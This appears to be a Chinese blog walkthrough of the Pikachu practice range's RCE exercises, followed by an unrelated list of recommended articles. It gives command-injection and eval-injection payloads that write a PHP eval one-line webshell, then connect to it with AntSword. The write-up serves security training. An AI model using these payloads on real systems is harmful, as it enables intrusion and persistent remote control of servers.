Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
云雾J视界13 小时前
AI服务器供电革命:为何交错并联Buck成为算力时代的必然选择
服务器·人工智能·nvidia·算力·buck·dgx·交错并联
無限神樂13 小时前
docker compose简介
运维·docker·容器
ELI_He99913 小时前
gpg使用记录
linux·运维·服务器
zzh_my13 小时前
centos yum 安装软件报错
linux·运维·centos
杰克崔13 小时前
内核里的__private变量的使用及sparse
linux·运维·服务器·车载系统
每次学一点13 小时前
如何将网吧电脑加入ZeroTier虚拟局域网
运维·服务器·网络
勉灬之13 小时前
基于 Node.js + mysql2 的实用同步助手,适合开发/测试环境下快速对齐表数据
服务器·网络·node.js
很㗊13 小时前
Linux --- tar命令常见用法
linux·运维·服务器
2501_9413297213 小时前
气压表智能读数检测:基于YOLOv8的指针与刻度识别实现自动化读数
运维·yolo·自动化
RisunJan13 小时前
Linux命令-ld(将目标文件连接为可执行程序)
linux·运维·服务器